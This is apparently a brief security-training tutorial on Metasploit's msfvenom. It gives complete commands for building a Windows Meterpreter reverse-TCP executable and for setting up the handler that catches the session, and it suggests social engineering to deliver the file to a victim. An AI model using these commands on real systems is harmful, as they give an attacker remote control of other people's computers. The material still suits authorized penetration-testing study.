Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.
Entering from the ubuntu terminal with root user.
The new tool msfvenom incorporates a help in the terminal itself so that we know the “flags” that we can use, to enter this help it is enough to type:
To see what payloads are available from Framework, you can do:
msf5> msfvenom -l payloads
# msfvenom -l payloads
How to generate a payload
This command uses msfvenom to create a malicious executable file that will open a Meterpreter session using a reverse TCP payload. The listening host is your own computer.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.14 LPORT=4444 -f exe -a x64 -o /home/infosecaddicts/infoecaddicts.exe
We have created our malicious file called infosecaddicts.
This handler will listen for the payload and attempt to open a Meterpreter session onto the victim’s
msf> use exploit/multi/handler msf> set PAYLOAD windows/x64/meterpreter/reverse_tcp msf> set LHOST 192.168.1.14 msf> set LPORT 4444 msf> run
After creating our malicious file we just have to get it to the victim machine and execute it, you can use social engineering or any other method.
As a result, you will have the meterpreter session.
In the same way that we did it for windows we can do it for any other operating system for examples: Android, iOS, Liniux etc …
If you are interested in learning more, we invite you to review this course.